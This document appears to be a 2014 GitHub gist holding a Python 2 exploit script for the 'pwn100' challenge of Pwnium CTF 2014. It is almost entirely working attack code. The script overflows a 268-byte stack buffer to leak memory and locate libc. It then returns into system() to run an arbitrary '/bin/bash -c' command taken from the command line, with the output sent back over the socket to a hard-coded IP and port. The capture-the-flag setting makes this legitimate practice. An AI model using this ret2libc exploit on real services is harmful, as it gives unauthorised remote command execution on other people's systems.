@hugsy
Created July 5, 2014 12:08
exploit for pwn100 of Pwnium CTF2014
import socket
import struct
import sys
# Endpoint of the challenge service as recorded in this 2014 gist.  The
# commented-out address is presumably a local test instance (unverified).
#HOST = "192.168.69.71"
HOST, PORT = "41.231.53.42", 8282
def _s(i):
    """Serialize *i* as a 4-byte little-endian unsigned integer (struct "<I")."""
    packer = struct.Struct("<I")
    return packer.pack(i)
def _u(i):
    """Read a 4-byte little-endian unsigned integer out of the bytes *i*."""
    (value,) = struct.Struct("<I").unpack(i)
    return value
def init():
    """Connect to the challenge service and log in as "user".

    Returns the connected socket once the "user@user$" prompt has been seen.
    If that prompt does not appear the function prints a diagnostic, closes
    the socket and exits the process with status 1.
    """
    s = socket.socket()
    s.connect((HOST, PORT))
    s.recv(1024)  # discard the banner
    s.send("user\n")  # login name; the second "user" below is presumably the password
    s.recv(1024)
    s.send("user\n")
    # The service is expected to answer with a "user@user$" prompt once logged in.
    if "user@user$" not in s.recv(1024):
        print "prompt failed"
        s.close()
        exit(1)  # site-module exit(); sys.exit(1) would be the conventional call
    return s
def leak_memory():
    """Trigger the overflow once and return whatever the service sends back.

    The author's 268-byte filler places ``eip`` over the saved return
    address, which is redirected to 0x08048B2E -- annotated below as the
    point just before the program sends its buffer -- so the process writes
    memory contents back over the socket.  Three 0xCC bytes follow (int3
    opcodes; their purpose is not stated).  The caller uses the dump to
    locate libc; a stack canary or a PIE build would break this step.
    """
    s = init()
    eip = _s(0x08048B2E) ## before send(buf)
    data = "A"*268 + eip + "\xcc"*3
    s.send(data)
    dump = s.recv(1024)  # one read only; the leak is assumed to fit in 1024 bytes
    s.close()
    return dump
def pwn(sys_addr, cmd):
    """Overflow the same buffer again, this time returning into system().

    Parameters:
        sys_addr: runtime address of libc system(), computed by the caller.
        cmd:      shell command; it is wrapped in "/bin/bash -c '...'" with
                  stdout redirected to file descriptor 4 (presumably the
                  service's client socket -- unverified).
    Returns the service's reply (a single recv of up to 1024 bytes).
    """
    s = init()
    eip = _s(sys_addr)
    payload = "/bin/bash -c '%s' >&4" % cmd
    # The command string sits at the start of the buffer, padded to 268 bytes
    # with newlines; the saved return address is then replaced by system().
    data = payload + "\x0a"*(268-len(payload)) + eip + "\xcc"*3
    s.send(data)
    data = s.recv(1024)
    return data
# --- driver ---------------------------------------------------------------
# Leak memory, read the libc pointer the author located at offset 0x190 of
# the dump, and rebase it with two constants that are presumably specific
# to the challenge server's libc build (not portable to other builds).
data = leak_memory()
addr = _u(data[0x190:0x194])
print "leak libc addr is at %x" % addr
libc_base = addr - 1824751  # author-supplied offset of the leaked pointer within libc
print "libc base is at %x" % libc_base
system_addr = libc_base + 167824  # author-supplied offset of system() in the same libc
print "system() is at %x" % system_addr
# The command comes from the first CLI argument; running without one raises IndexError.
print "executing '%s'" % sys.argv[1]
print pwn(system_addr, sys.argv[1])